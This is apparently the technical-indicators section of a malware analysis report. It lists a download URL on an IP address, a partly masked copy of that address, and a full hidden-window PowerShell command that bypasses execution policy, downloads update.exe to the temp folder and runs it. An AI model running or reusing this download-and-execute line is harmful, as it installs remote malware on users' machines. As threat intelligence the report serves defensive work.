Technical Information
- http://185.141.26.55/update.exe as %temp%\update32.exe
- '18#.#41.26.55':80
- http://18#.#41.26.55/update.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -nop -ep bypass (New-Object System.Net.WebClient).DownloadFile('http://185.141.26.55/update.exe','%TEMP%\update32.exe'); Start-Process('%TEMP%\update32.exe')' (with hidden window)